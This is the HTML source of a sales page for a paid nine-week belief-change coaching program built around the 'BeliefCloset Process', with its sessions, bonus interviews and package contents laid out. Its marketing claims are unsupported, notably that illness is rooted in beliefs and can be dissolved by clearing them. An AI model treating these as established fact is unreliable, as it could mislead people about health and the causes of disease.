are stored, you can clear your earliest, pre-verbal programs. It takes some work, and it''s <em>very </em>effective.\r\n\r\n</div>\r\n<h1>The <em>Clear Your Beliefs Coaching Program</em> can:</h1>\r\n<ul class="indented">\r\n 	<li>Eliminate blocks, resistance, and fears that have prevented you from showing up authentically and fulfilling your purpose.</li>\r\n 	<li>Remove the cold, wet blanket that your parents, teachers, and society threw over you (and your dreams) when you were young.</li>\r\n 	<li>Give you the power to change your experiences – and your circumstances – at will.</li>\r\n 	<li>Show you how to gain mastery over your moods, perceptions, and responses.</li>\r\n</ul>\r\n<h1>How the <em>Clear Your Beliefs </em>Program Shifts Your Life</h1>\r\n<div class="parg-text">\r\n\r\n<a href="http://clearyourbeliefs.com/wp-content/uploads/2014/06/lotus-flower-reflected.jpg"><img class="alignleft wp-image-962 " src="http://clearyourbeliefs.com/wp-content/uploads/2014/06/lotus-flower-reflected-300x225.jpg" alt="lotus flower reflected" width="180" height="135" /></a>During the 9-week <em>Clear Your Beliefs</em> program, your coach will invite all aspects of you – mental, emotional, physical, and spiritual – to work together to transform your psychological <em>set point</em> – the inner structure of your personality that formed during your first years of life.\r\n\r\n</div>\r\n<div class="parg-text">\r\n\r\nIf you''re ready to remove limitations that have held you back, and create the life of your dreams, register for this carefully guided 9-part program, skillfully led by your Clear Beliefs coach, along with the recorded program by Lion Goodman, creator of the <em>Clear Beliefs Process<strong>. </strong></em>\r\n\r\n</div>\r\n<div class="parg-text">\r\n\r\nDuring each session, you''ll uproot subconscious beliefs that have interfered with your success, happiness and personal freedom. You''ll upgrade your health, your work, and your relationships. You''ll examine and eliminate beliefs that were programmed into you about yourself, other people, and the world.\r\n\r\n</div>\r\n<div class="parg-text">\r\n\r\nThe Clear Your Beliefs program includes seven pre-recorded guided sessions, which you can download and listen to anytime, plus nine live coaching sessions with a Certified Clear Beliefs Coach. They will meet with you once each week (or as you arrange, based on your schedule) to review the work you''ve done using the recorded class, and prepare you for the next session. Your coach will help you go deeper than you could possibly go on your own, guiding you carefully into the depths of your own subconscious beliefs, core wounds, childhood traumas, and blocks. You will learn how to clear them, one by one.\r\n\r\n</div>\r\n<div class="icon_box">\r\n<h1>With This Methodology, You Can Finally:</h1>\r\n<ul>\r\n 	<li>Manifest your dreams and your life purpose<a href="http://beliefcloset.com/cyb/wp-content/uploads/2014/02/stone-doorway.jpg"><img class=" wp-image-317 alignright" src="http://beliefcloset.com/cyb/wp-content/uploads/2014/02/stone-doorway-220x300.jpg" alt="stone-doorway" width="150" height="205" /></a></li>\r\n 	<li>Remove resistance and barriers</li>\r\n 	<li>Open doors to new opportunities</li>\r\n 	<li>Eliminate pain and suffering from the past</li>\r\n 	<li>Experience more fulfillment in your relationships</li>\r\n 	<li>Attract more abundance and prosperity</li>\r\n 	<li>Increase your energy, vitality, and productivity</li>\r\n</ul>\r\n</div>\r\n<div class="parg-text">\r\n\r\n<strong>You''ll step more fully into living as the magnificent, radiant being you already are</strong> (and eliminate the fear of doing so!).\r\n\r\n</div>\r\n&nbsp;\r\n<div class="message_box">\r\n<h1>A Message from Lion Goodman...</h1>\r\n<div class="mb-img"><a href="http://clearyourbeliefs.com/wp-content/uploads/2014/04/lion-full1.jpg"><img class="alignleft wp-image-384 " src="http://clearyourbeliefs.com/wp-content/uploads/2014/04/lion-full1.jpg" alt="lion-full1" width="171" height="236" /></a></div>\r\nDear Explorer:\r\n\r\nAs a child, I believed there was something wrong with me. I didn''t look or feel like the other kids. I didn''t like who I was. I felt separate and alone. I didn''t know how to make it better.\r\n\r\nI was gripped by some of life''s biggest questions: "Who am I? Why am I here? What makes me different? What is life about?"\r\n\r\nI began to search for answers, learning everything I could, hoping someday I would figure it all out, and finally become normal and accepted. (Fortunately, the "normal" part never happened!)\r\n\r\nAfter decades of studying psychology, neurology, philosophy, history, religions, and engaging in therapy, workshops, and spiritual practices, I found answers to most of my questions.\r\n\r\nI noticed that whenever my life changed for the better, there had been shifts in my beliefs: When I changed my beliefs about myself, I became happier and more successful. When I changed my beliefs about others, my relationships improved. When I shifted my beliefs about the world and it''s possibilities, new opportunities came my way.\r\n\r\n<a href="http://beliefcloset.com/cyb/wp-content/uploads/2014/04/studied1.jpg"><img class=" wp-image-295 alignright" style="margin-top: 5px; margin-bottom: 5px;" src="http://beliefcloset.com/cyb/wp-content/uploads/2014/04/studied1-289x300.jpg" alt="studied" width="198" height="206" /></a>The most powerful leverage for success turned out to be <em><strong>my beliefs</strong></em>. So I searched for ways to change beliefs directly. I wanted a method that worked consistently, and transformed beliefs permanently.\r\n\r\nThe belief-change methods I studied turned out to be only partially effective. I asked Source to help me with this dilemma. And one day, I received a divine gift: a "download" – a way to delete beliefs easily and permanently by engaging the subconscious mind in a playful way. I called it <em>The BeliefCloset Process<strong>®</strong></em> because it used the colorful metaphor of <em>clothing in your closet</em> to represent <em>beliefs in your subconscious mind</em>.\r\n\r\nWhen your closet is crammed full of old outfits you''ll never wear, it''s time for some Spring cleaning!\r\n\r\n<em>The BeliefCloset Process</em> turned out to be much more than a belief-delete button. It''s a method for <strong>healing deep psychological wounds.</strong>\r\n\r\nHaving worked with thousands of clients over the past decade, I''ve watched profound change echo through their lives, lightening their burdens and creating a brighter future. During the past decade, I''ve taught this methodology to hundreds of coaches, therapists and healers in 18 countries around the world. Testimonials from clients pour in, expressing deep gratitude for the ability to clear long-standing problems that other methods haven''t touched.\r\n\r\nI am grateful to have brought it through. Now I want to share it with you. In the <strong><em>Clear Your Beliefs Coaching </em></strong>program, we''ll guide you shift beliefs and patterns that no longer serve you. <a href="http://beliefcloset.com/cyb/wp-content/uploads/2014/04/key1.jpg"><img class=" wp-image-253 alignleft" src="http://beliefcloset.com/cyb/wp-content/uploads/2014/04/key1-220x300.jpg" alt="key" width="151" height="207" /></a>\r\n\r\nYour old programs might be creating a mess in your relationship with your partner, or your children. They might be limiting your business or financial success. Your beliefs about work may be making you unhappy, or your beliefs about your body may be impacting your health.\r\n\r\nIf you feel limited or stuck in any part of your life, there are beliefs underneath those feelings – and you can change them.\r\n\r\nA lot of people say, "just change your beliefs..." as if it were easy. The truth is, it takes the right technique, applied in the right way, along with the right guidance.\r\n\r\nIn the <em>Clear Your Beliefs</em> course, you''ll get guidance from me, through a series of recorded classes, plus customized individual work with your professional <em>Clear Your Beliefs Coach</em> follow up on the  work you do between sessions. You''ll experience nine sessions of deep healing and transformation, going deeper and deeper with your coach. Clear your old beliefs, and create the life you want.\r\n\r\nThis is <em>true self-empowerment</em>. Decide what you want, and how you want to live. Then go out and make it so. Use the process to clear whatever gets in your way. Your light will shine more brightly, and new possibilities will open.\r\n\r\nLive the life of your dreams. There''s nothing to stop you – except a few old beliefs...\r\n\r\nIn gratitude, and with warm wishes for your total success,\r\n\r\n<a href="http://beliefcloset.com/cyb/wp-content/uploads/2014/04/lion-signature-300x70.png"><img class="alignnone wp-image-490 no-shad" src="http://beliefcloset.com/cyb/wp-content/uploads/2014/04/lion-signature-300x70.png" alt="lion-signature-300x70" width="377" height="87" /></a>\r\n\r\nLion Goodman, Creator of <em>The BeliefCloset Process</em>\r\n\r\n</div>\r\n&nbsp;\r\n<h1>Register Today and Discover What''s Possible</h1>\r\n<div class="parg-text">\r\n\r\nWe are delighted to offer you this empowering program, which thousands of people from around the world have successfully completed. You''ll receive <strong>seven 90-minute recorded sessions</strong>, which you can listen to at your convenience.  In addition, you''ll be connected to one of our awesome <strong>Certified Clear Beliefs Coaches</strong> (they''re all over the world, so we can accommodate your schedule).\r\n\r\nEach week, you''ll learn more about your old limiting and negative beliefs, and you''ll change them – permanently – with the <em>BeliefCloset Process</em>, a proven technology for inner transformation and empowerment, along with other techniques such as BodyWisdom, Voice Dialogue, and Inner Child work, as guided by your coach.  You''ll feel freer, more open, less reactive, more motivated, and able to carry out the actions that you''ve wanted to do for a long time.\r\n\r\n<img class="no-shad seprit aligncenter wp-image-747 size-medium" src="http://clearyourbeliefs.com/wp-content/uploads/2014/06/line-300x14.png" alt="line" width="300" height="14" />\r\n\r\n</div>\r\n<h5>Your 9 Sessions:</h5>\r\n<h5><span class="session">Session 0: Getting to Know Your Issues and Beliefs </span></h5>\r\nIn your first meeting with your coach, you''ll get to know each other, and your coach will give you the assignment of beginning to document your beliefs in every area of your life.  You''ll look deeply into your childhood experiences, and identify where your negative and limiting beliefs came from, and why they continue to hold you back, or interfere with your forward momentum.\r\n\r\nYour coach will give an overview of the work you''ll do together, and will schedule the next eight sessions with you.  You will work together to identify the particular issues and patterns you want to change, and the course will be customized to your needs.\r\n\r\n<img class="no-shad seprit aligncenter wp-image-747 size-medium" src="http://clearyourbeliefs.com/wp-content/uploads/2014/06/line-300x14.png" alt="line" width="300" height="14" />\r\n<div class="module">\r\n<div class="mod_h">\r\n<h5><span class="session">Session 1: </span><strong>Pull All the Old Junk Out of Your BeliefCloset®</strong></h5>\r\n</div>\r\n<div class="module_body">\r\n\r\n<a href="http://beliefcloset.com/cyb/wp-content/uploads/2014/02/mod1.jpg"><img class=" wp-image-309 alignleft" src="http://beliefcloset.com/cyb/wp-content/uploads/2014/02/mod1-199x300.jpg" alt="mod1" width="130" height="212" /></a>When you begin Spring cleaning, the first step is that dreaded moment when you open the door to your closet, and realize that you have to take everything <strong>out</strong> in order to begin the sorting process, before you can decide what to keep and what to toss.\r\n\r\nIn this first session, you''ll examine your old beliefs, and determine which ones no longer serve you. It''s time to discard them and clear some space! You''ll get your first in-depth experience with the <em>BeliefCloset Process</em> and discover that you can permanently delete a belief from your past – even beliefs that have been annoying you for decades. You''ll feel more open, empowered and free to choose your beliefs and the way you live your life.\r\n\r\n</div>\r\n<div class="module_body">\r\n\r\n<strong> In Session 1, you will:</strong>\r\n<ul>\r\n 	<li>Discover old limiting beliefs that are deeply buried in your subconscious mind</li>\r\n 	<li>Learn which ones keep you stuck, preventing you from having what you want in life</li>\r\n 	<li>Experience a process that returns you to your True Self, the home of inner joy and bliss</li>\r\n 	<li>Begin to work with, not against, your subconscious mind – where your beliefs reside</li>\r\n</ul>\r\n</div>\r\n</div>\r\n<img class="no-shad seprit aligncenter wp-image-747 size-medium" src="http://clearyourbeliefs.com/wp-content/uploads/2014/06/line-300x14.png" alt="line" width="300" height="14" />\r\n<div class="module">\r\n<div class="mod_h">\r\n<h5><span class="session">Session 2: </span><strong>Clear Your Negative Beliefs About Who You Are</strong></h5>\r\n</div>\r\n<div class="module_body">\r\n\r\n<a href="http://beliefcloset.com/cyb/wp-content/uploads/2014/04/sess2.jpg"><img class=" wp-image-375 alignleft" src="http://beliefcloset.com/cyb/wp-content/uploads/2014/04/sess2-300x199.jpg" alt="sess2" width="194" height="128" /></a>In the 2nd module, you''ll focus on issues and problems that have kept you from being happy and joyful.\r\n\r\nWhat do you believe about yourself? Your idea of "Who I am" is based on beliefs and programming you got as a child. What messages did your parents, caregivers, and siblings plant in your child brain that still affect you? In the BeliefCloset, keeping your old beliefs about who you are is akin to keeping all of your infant clothes (including those smelly diapers!) in your closet. It''s time to haul them out, and toss them out! You don''t need them anymore. If you hear critical inner voices berating you, don''t miss this session. Rid yourself of those pesky critical voices along with the diapers!\r\n\r\n</div>\r\n<div class="module_body"></div>\r\n<div class="module_body">\r\n\r\n<strong> In Session 2, you will:</strong>\r\n<ul>\r\n 	<li>Use the <em>BeliefCloset Process</em> to get underneath negative feelings about yourself</li>\r\n 	<li>Clear old, limiting beliefs about who you are, and what you deserve, so you can enjoy life again</li>\r\n 	<li>See your own magnificence through a new clear lens of your own beauty and joy</li>\r\n</ul>\r\n</div>\r\n</div>\r\n<img class="no-shad seprit aligncenter wp-image-747 size-medium" src="http://clearyourbeliefs.com/wp-content/uploads/2014/06/line-300x14.png" alt="line" width="300" height="14" />\r\n<div class="module">\r\n<div class="mod_h">\r\n<h5><span class="session">Session 3: </span><strong>Clear Your Limiting Beliefs About What You Are Capable Of</strong></h5>\r\n</div>\r\n<div class="module_body">\r\n\r\n<a href="http://beliefcloset.com/cyb/wp-content/uploads/2014/02/sess3.jpg"><img class=" wp-image-311 alignleft" src="http://beliefcloset.com/cyb/wp-content/uploads/2014/02/sess3-300x200.jpg" alt="sess3" width="206" height="137" /></a>Your abilities are limited only by your beliefs. If someone else can do it, so can you.\r\n\r\nThis isn''t a magic pill – you still have to learn skills and practice them – but the only thing in your way is your old beliefs.\r\n\r\n<em>What are you capable of? </em>If your answer is "Anything..." you don''t need this session. But most of us think too small...\r\n\r\n</div>\r\n<div class="module_body">\r\n\r\nOur <em><strong>will</strong></em> has been weakened from lack of use – like muscles that shrink when they''re not exercised. We let our negative beliefs stop us. You may hear internal voices say, <em>"What''s the use? You''ll fail anyway. You don''t deserve happiness – look at you!" </em>We were shamed into thinking that we were less than others.We learned to compare ourselves to others – and we always lose that contest. Clear out any apparent limitations you''ve taken on, and find your true power to create what you want. Do whatever you need to do in order to achieve your vision.\r\n\r\n</div>\r\n<div class="module_body"></div>\r\n<div class="module_body">Do you have beliefs that stop you from dreaming big, or following through? Do you procrastinate or get distracted? In this session, you''ll eliminate those beliefs and relieve yourself of those symptoms. You''re already a master manifestor – you''re just manifesting your old programs!</div>\r\n<div class="module_body"></div>\r\n<div class="module_body">\r\n\r\n<strong> In Session 3, you will:</strong>\r\n<ul>\r\n 	<li>Identify old beliefs that stand between you and creating the life you want</li>\r\n 	<li>Dissolve the old beliefs that get in your way over and over, or make you quit when you''re partway there.</li>\r\n 	<li>Imagine what it means to live without self-imposed limitations, trusting that you can create anything you want</li>\r\n</ul>\r\n</div>\r\n</div>\r\n<img class="no-shad seprit aligncenter wp-image-747 size-medium" src="http://clearyourbeliefs.com/wp-content/uploads/2014/06/line-300x14.png" alt="line" width="300" height="14" />\r\n<div class="module">\r\n<div class="mod_h">\r\n<h5><span class="session">Session 4: </span><strong>Clear Your Outdated Beliefs About Love and Relationships</strong></h5>\r\n</div>\r\n<div class="module_body">\r\n\r\n<a href="http://beliefcloset.com/cyb/wp-content/uploads/2014/02/sess4.jpg"><img class=" wp-image-312 alignleft" src="http://beliefcloset.com/cyb/wp-content/uploads/2014/02/sess4-300x177.jpg" alt="sess4" width="237" height="141" /></a>In this session, you''ll delete beliefs that interfere with your personal relationships.\r\n\r\nIf you''re married, are you happy and secure? Or are you anxious about the future? If you''re not in a relationship, what''s holding you back from finding your ideal mate?\r\n\r\nHumans are social creatures – we must relate to others to survive. At our core, we want a security and safety, but we also want passion and romance. You learned "what love is" from your parents – so it''s no wonder that you''re confused! Most of us repeat patterns we learned from our early childhood. We watched our parents interact, and Mom and Dad''s relationship became our model of what a relationship is supposed to look like. In your family, love may have been contaminated by disdain, contempt, withdrawal, or abuse. We were programmed to repeat their patterns – without conscious choice. This session looks at early infant bonding patterns and how those patterns get reproduced in our adult relationships unconsciously – until we change them.\r\n\r\n</div>\r\n&nbsp;\r\n<div class="module_body"></div>\r\n<div class="module_body">\r\n\r\n<strong> In Session 4, you will:</strong>\r\n<ul>\r\n 	<li>Look deeply into the childhood patterns that enabled you to survive and thrive</li>\r\n 	<li>See which of your beliefs now interfere with your intimate relationships</li>\r\n 	<li>Discover how easy it is to shift these beliefs at the core of the psyche and transform relationship difficulties into vibrant, loving interactions</li>\r\n</ul>\r\n</div>\r\n</div>\r\n<img class="no-shad seprit aligncenter wp-image-747 size-medium" src="http://clearyourbeliefs.com/wp-content/uploads/2014/06/line-300x14.png" alt="line" width="300" height="14" />\r\n<div class="module">\r\n<div class="mod_h">\r\n<h5><span class="session">Session 5: </span><strong>Clear Your Old Beliefs About Money and Work</strong></h5>\r\n</div>\r\n<div class="module_body">\r\n\r\n<a href="http://beliefcloset.com/cyb/wp-content/uploads/2014/02/sess5.jpg"><img class=" wp-image-313 alignleft" src="http://beliefcloset.com/cyb/wp-content/uploads/2014/02/sess5-300x200.jpg" alt="sess5" width="222" height="148" /></a>In this session, you''ll focus on money, wealth and abundance – or the lack thereof!\r\n\r\nWhat do you believe about earning a living in today''s economy? Is money really the root of all evil?\r\n\r\nIf you want to experience true abundance, you have to eliminate the belief that money is bad – or a problem. Your current financial state is a reflection of the beliefs you inherited from your family, religion, and culture. Can you see their influence?\r\n\r\n</div>\r\n<div class="module_body"></div>\r\n<div class="module_body">\r\n\r\n<strong> In Session 5, you will:</strong>\r\n<ul>\r\n 	<li>Examine your family and cultural beliefs about money, work, poverty and "deservingness."</li>\r\n 	<li>Remove beliefs that create stumbling blocks in the way of natural abundance</li>\r\n 	<li>Create new beliefs that enable you to open to the flow of money and resources, and the life of abundance you want - and deserve</li>\r\n 	<li>Learn why affirmations alone, and the "Law of Attraction," don''t work, regardless of how diligently you practice them</li>\r\n</ul>\r\n</div>\r\n</div>\r\n<img class="no-shad seprit aligncenter wp-image-747 size-medium" src="http://clearyourbeliefs.com/wp-content/uploads/2014/06/line-300x14.png" alt="line" width="300" height="14" />\r\n<div class="module">\r\n<div class="mod_h">\r\n<h5><span class="session">Session 6: </span><strong>Clear Uncomfortable Beliefs About Your Body and Health</strong></h5>\r\n</div>\r\n<div class="module_body">\r\n\r\n<a href="http://beliefcloset.com/cyb/wp-content/uploads/2014/02/sess6.jpg"><img class=" wp-image-314 alignleft" src="http://beliefcloset.com/cyb/wp-content/uploads/2014/02/sess6.jpg" alt="sess6" width="205" height="136" /></a>In this session, you''ll focus on issues and problems with your health – whether they appear in your physical, emotional, mental or spiritual body.\r\n\r\nIll health (dis-ease) is often the result of beliefs that were indoctrinated into you, or conclusions you came to when you came to certain conclusions during your early childhood. What do you believe and perceive about your body? Your health? Your age? Your vitality? Your ability to heal? The future of your health?\r\n\r\n</div>\r\n<div class="module_body"></div>\r\n<div class="module_body">\r\n\r\n<strong> In Session 6, you will:</strong>\r\n<ul>\r\n 	<li>Identify old beliefs that stand between you and vibrant health</li>\r\n 	<li>Recognize beliefs that make you vulnerable to disease and injury</li>\r\n 	<li>Dissolve old beliefs at the root of illness, bad habits and lifestyle stress</li>\r\n 	<li>Imagine the healthy, vibrant body you want, and create it consciously with new beliefs</li>\r\n</ul>\r\n</div>\r\n</div>\r\n<img class="no-shad seprit aligncenter wp-image-747 size-medium" src="http://clearyourbeliefs.com/wp-content/uploads/2014/06/line-300x14.png" alt="line" width="300" height="14" />\r\n<div class="module">\r\n<div class="mod_h">\r\n<h5><span class="session">Session 7: </span><strong>Clear Out The Rest Of The Junk In Your BeliefCloset!</strong></h5>\r\n</div>\r\n<div class="module_body">\r\n\r\n<a href="http://beliefcloset.com/cyb/wp-content/uploads/2014/04/sess7.jpg"><img class=" wp-image-265 alignleft" src="http://beliefcloset.com/cyb/wp-content/uploads/2014/04/sess7-300x187.jpg" alt="sess7" width="214" height="134" /></a>In this final session, you''ll examine any remaining issues or challenges in your life, and learn how to use the <strong><em>BeliefCloset Process</em></strong> to eliminate them, one belief at a time.\r\n\r\nYou''ll learn additional techniques for eliminating uncomfortable sensations and feelings, and open opportunities to experience the miracles of life.\r\n\r\nWhen you know that your feelings, perceptions, and circumstances are all created by your beliefs, and when you have a technique for identifying them and eliminating them, you''ll have the power of any Creator – the power to shape the world as you decide, creating a better place for you and those you love.\r\n\r\n</div>\r\n<div class="module_body"></div>\r\n<div class="module_body">\r\n\r\n<strong> In Session 7, you will:</strong>\r\n<ul>\r\n 	<li>Scan your life for problems and interference, and put them under the <em>BeliefCloset</em> microscope so you can uproot negative core beliefs – where they live</li>\r\n 	<li>Learn to use the <em>BeliefCloset Process</em> on your own, anytime, so you can become the Captain of your fate – and your own experience – for the rest of your life</li>\r\n 	<li>Find your <strong>True Self</strong> – the creator of your reality – and recognize it as the truth of who you really are</li>\r\n</ul>\r\n</div>\r\n</div>\r\n<img class="no-shad seprit aligncenter wp-image-747 size-medium" src="http://clearyourbeliefs.com/wp-content/uploads/2014/06/line-300x14.png" alt="line" width="300" height="14" />\r\n<h5><span class="session">Final Session: Review of Your Progress, and Setting the Course for Your Future</span></h5>\r\nIn the 9th session, you will review the progress you''ve made, and your coach will help you review the arc of your inner development.  Together, you''ll examine your short-term and long-term goals, and your coach will prescribe particular processes you can do on your own from this point forward, and will also offer additional guidance as required, as you bring your creative potential into the life you desire.\r\n\r\nLife, and Manifestation, are both full of forward momentum, and also problems and issues that come up along the way.  No one can solve all of their problems in 9 weeks, but you''ll complete this course with a set of powerful tools to use for the rest of your journey, and a trusted guide who can continue to support you into the future.\r\n\r\n</div>\r\n<img class="no-shad seprit aligncenter wp-image-747 size-medium" src="http://clearyourbeliefs.com/wp-content/uploads/2014/06/line-300x14.png" alt="line" width="300" height="14" />\r\n<div class="parg-text">\r\n<h1 id="bonus">You''ll Also Receive the <em>Clear Your Beliefs</em><em>Bonus Collection</em></h1>\r\nIn addition to these seven transformational sessions, you''ll also receive these awesome bonus interviews and gifts. These two world luminaries will complement your learning and progress during the course, and take your understanding and practice to an even deeper level.\r\n\r\n&nbsp;\r\n<div class="module">\r\n<div class="mod_h bbb"><span class="session">Bonus #1: <strong>Love: What Makes It So Confusing?\r\n<em>Guest Faculty: Carista Luminare, Ph.D.</em></strong></span></div>\r\n<div class="module_body">\r\n\r\n<a href="http://clearyourbeliefs.com/wp-content/uploads/2014/06/Carista-Portrait-3.jpg"><img class="alignleft wp-image-1053" src="http://clearyourbeliefs.com/wp-content/uploads/2014/06/Carista-Portrait-3-232x300.jpg" alt="Carista Portrait 3" width="161" height="209" /></a>We all want more love in our life, but something keeps getting in the way. We can''t seem to stop hurting each other. What''s going on?\r\n\r\nLion interviews Carista Luminare, Ph.D., author of <em>Parenting Begins Before Conception</em>, President of Luminary Leadership Institute, and co-creator of <em>Confused About Love? </em> and <em>The Power of Love</em> program. (She is also known as <em>Lion''s fiance''</em>)\r\n\r\nCarista shares the latest research on how our early bonding patterns with our parents play out repeatedly in our adult relationships. We''re confused about what love is, and how to love. The answers are in our neurology, our earliest programming, and our beliefs about love and how to get it.\r\n\r\nLearn how to determine your own (and your partner''s) LoveStyle, using the <em>LoveStyle Profile Quiz </em>(Bonus # 2). You''ll also get some practical tips for healing old wounds and bringing passion and security back into your relationship.\r\n<strong>\r\nCarista Luminare</strong>, Ph.D., is President of Luminary Leadership Institute. She has 30 years experience as a consultant, counselor and coach to executives, entrepreneurs, and organizations. Her comprehensive, holistic parenting methodology is described in her groundbreaking book, <em>"Parenting Begins Before Conception."</em> In partnership with Lion, she developed LLI''s leading-edge evolutionary leadership program. After graduating from Harvard University in Psychology and Social Relations in 1978, she pioneered educational and therapeutic programs focused on the integration of the personality and soul.\r\n\r\n</div>\r\n</div>\r\n<img class="no-shad seprit aligncenter wp-image-747 size-medium" src="http://clearyourbeliefs.com/wp-content/uploads/2014/06/line-300x14.png" alt="line" width="300" height="14" />\r\n<div class="module">\r\n<div class="mod_h bbb"><span class="session">Bonus #2 <strong>- The LoveStyle Profile Quiz </strong></span></div>\r\n<div class="module_body">\r\n\r\n<a href="http://beliefcloset.com/cyb/wp-content/uploads/2014/04/bon21.jpg"><img class=" wp-image-242 alignleft" src="http://beliefcloset.com/cyb/wp-content/uploads/2014/04/bon21-300x100.jpg" alt="bon2" width="270" height="90" /></a>Take this 5-minute assessment to learn how your childhood bonding patterns impact your adult relationships. Developed by Carista Luminare and Lion Goodman, you''ll receive a complete ten-page report that introduces you to the 5 LoveStyles, and shows you where you are on each spectrum.\r\n\r\n</div>\r\n</div>\r\n<img class="no-shad seprit aligncenter wp-image-747 size-medium" src="http://clearyourbeliefs.com/wp-content/uploads/2014/06/line-300x14.png" alt="line" width="300" height="14" />\r\n<div class="module">\r\n<div class="mod_h bbb"><span class="session">Bonus #3: <strong> The Spiritual Technology of Manifesting\r\nGuest Faculty: Anodea Judith, Ph.D. </strong></span></div>\r\n<div class="module_body">\r\n\r\n<img class=" wp-image-396 alignleft" src="http://beliefcloset.com/cyb/wp-content/uploads/2014/04/bon3.jpg" alt="bon3" width="189" height="169" />Why don''t affirmations and the Law of Attraction work? You''ll learn why in this interview with internationally acclaimed author and teacher Anodea Judith, one of the world''s leading experts on the Chakras. Her books have sold more than 500,000 copies worldwide.\r\n\r\n</div>\r\n<div class="module_body">\r\n\r\nLion and Anodea discuss the principles of Manifestation outlined in their book, <em>Creating On Purpose: The Spiritual Technology of Manifesting Through the Chakras. </em>Beliefs are at the core of the manifestation process, and<em> t</em>heir book is a step-by-step manual for turning any dream into a reality by taking a single idea down through the chakras and into the real world. You''ll receive the first two chapters of the book as Bonus #4, below.\r\n\r\n</div>\r\n<div class="module_body">\r\n\r\nAnodea Judith, Ph.D. is the author of <em>Wheels of Life, Eastern Body/Western Mind, Creating On Purpose</em> (with Lion Goodman), and <em>The Global Heart Awakens</em>. She leads workshops on the chakras, psychological development, and spiritual transformation in the U.S. and around the world. Her books are considered classics in their field, and are used by many schools as textbooks for classes on healing and psychological development.\r\n\r\n</div>\r\n</div>\r\n<img class="no-shad seprit aligncenter wp-image-747 size-medium" src="http://clearyourbeliefs.com/wp-content/uploads/2014/06/line-300x14.png" alt="line" width="300" height="14" />\r\n<div class="module">\r\n<div class="mod_h bbb"><span class="session"><span class="session">Bonus #4: <strong> Excerpt from the book, "<em>Creating on Purpose: The Spiritual Technology of Manifesting Through the Chakras"</em></strong></span></span></div>\r\n<div class="module_body">\r\n\r\n<strong><em><a href="http://beliefcloset.com/cyb/wp-content/uploads/2014/04/creating-on-purpose.jpg"><img class=" wp-image-475 alignleft" style="box-shadow: none!important;" src="http://beliefcloset.com/cyb/wp-content/uploads/2014/04/creating-on-purpose-294x300.jpg" alt="creating-on-purpose" width="189" height="193" /></a>Creating On Purpose</em></strong> is a step-by-step guide to the manifestation process. In this free sample, you will:\r\n<ul style="padding-left: 20px;">\r\n 	<li>Be called to awaken your already-powerful ability to create the life of your dreams</li>\r\n 	<li>Learn how the chakras represent two human challenges: <strong>liberation</strong> (from the bottom up) and <strong>manifestation</strong> (from the top down)</li>\r\n 	<li>Understand the 7 chakras as stepping stones along the path of the manifestation process</li>\r\n 	<li>Gain an understanding of resistance, obstacles, and barriers that come up as you create what you want in life</li>\r\n 	<li>Learn a process that can strengthen your power of intention</li>\r\n</ul>\r\n</div>\r\n</div>\r\n<img class="no-shad seprit aligncenter wp-image-747 size-medium" src="http://clearyourbeliefs.com/wp-content/uploads/2014/06/line-300x14.png" alt="line" width="300" height="14" />\r\n<div class="module">\r\n<div class="mod_h bbb"><span class="session">Bonus #5:<strong> Change Your Beliefs eBook</strong></span></div>\r\n<div class="module_body">\r\n\r\n<a href="http://clearyourbeliefs.com/wp-content/uploads/2014/07/Clear-your-beliefs-ebook.png"><img class=" wp-image-433 alignleft" src="http://clearyourbeliefs.com/wp-content/uploads/2014/07/Clear-your-beliefs-ebook.png" alt="TYB Cover" width="159" height="206" /></a>\r\n\r\n</div>\r\n<div class="module_body">\r\n\r\nYou''ll also receive a copy of Lion''s multimedia eBook, "<em>Clear Your Beliefs: Delete Your Limiting Beliefs and Transform Your Life.</em>"\r\n\r\nLion explains the theory behind <em>The BeliefCloset Process</em>, and offers an explanation for why you do what you do, and why it''s so difficult to change your habitual patterns of thought and behavior.\r\n\r\nIt''s a beautifully produced primer on beliefs – where they come from, how they affect us, and what it takes to change them.\r\n\r\n</div>\r\n<div class="module_body"></div>\r\n</div>\r\n<img class="no-shad seprit aligncenter wp-image-747 size-medium" src="http://clearyourbeliefs.com/wp-content/uploads/2014/06/line-300x14.png" alt="line" width="300" height="14" />\r\n<div class="module">\r\n<div class="mod_h bbb"><span class="session">Bonus #6: <strong>Complete Transcripts of the Course</strong></span></div>\r\n<div class="module_body">\r\n\r\n<a href="http://clearyourbeliefs.com/wp-content/uploads/2014/06/ReportsLanding.jpg"><img class="alignleft wp-image-985" src="http://clearyourbeliefs.com/wp-content/uploads/2014/06/ReportsLanding-300x199.jpg" alt="ReportsLanding" width="148" height="98" /></a>You''ll also receive a <strong>complete set of downloadable PDF transcripts</strong> from the course, so you can refer to the material anytime in written form. This includes all 7 classes, plus two bonus interviews!\r\n\r\n</div>\r\n</div>\r\n&nbsp;\r\n<h1 id="bonus">Your Professional Coaching Sessions</h1>\r\nThe Clear Your Beliefs Program includes nine sessions with a Certified <em>Clear Your Beliefs Coach.  </em>He or she will accompany you on your journey and guide you, step-by-step, through the process.\r\n\r\n<em>Clear Your Beliefs Coaches</em> have been trained to help you deal with almost any issue, regardless of how long it''s been interfering with your life. Your coach will safely guide you down to the deepest levels of your psyche – which can be difficult to get to all by yourself – yet it''s where the most powerful changes occur. He or she will meet with you by phone (or Skype) each week, on a day that fits your schedule, at a time that''s convenient for you. (You may adjust the weekly schedule to suit your needs.)\r\n\r\nYour coach will guide you through any difficult inner terrain you might encounter, and help you identify and delete difficult-to-locate core beliefs – including core wounds, childhood traumas, bad early programming, and even issues of unknown origin.\r\n\r\n<strong>[Note: Our coaches help you change your own beliefs and reduce or eliminate the impact they''ve had on your life. They are not licensed psychotherapists or physicians. If you have a medical or mental health issue, please consult an appropriate professional who specializes in your particular diagnosis.]</strong>\r\n<h1 id="package"></h1>\r\n<p style="text-align: right;"><a href="http://clearyourbeliefs.com/program/#top"><span style="color: #2e2efe;">Up To Top</span></a></p>\r\n&nbsp;\r\n<div class="icon_box" style="background: #EFF8FB; width: 500px; margin: 17px auto;">\r\n<h1>Purchase Today and You''ll Receive:</h1>\r\n<h3><strong>Seven 90-Minute Recorded Sessions</strong></h3>\r\nLearn one of the world''s most powerful belief-change technologies, from the comfort of your own home. Each class session gives you the skill to easily change your beliefs – with 60 minutes of teaching followed by 30 minutes of Q&amp;A. Listen online, or download high-quality MP3s and listen anytime.\r\n<h3>Nine 1-hour Customized Coaching Sessions</h3>\r\nYou will work one-on-one with a Certified Clear Beliefs Coach.  We choose our coaches carefully. They have rigorous training, and we only choose the best for this program.  They are located all over the world, so we choose one nearest your time zone.  You can work with them by phone or Skype, based on your schedule.\r\n<h3 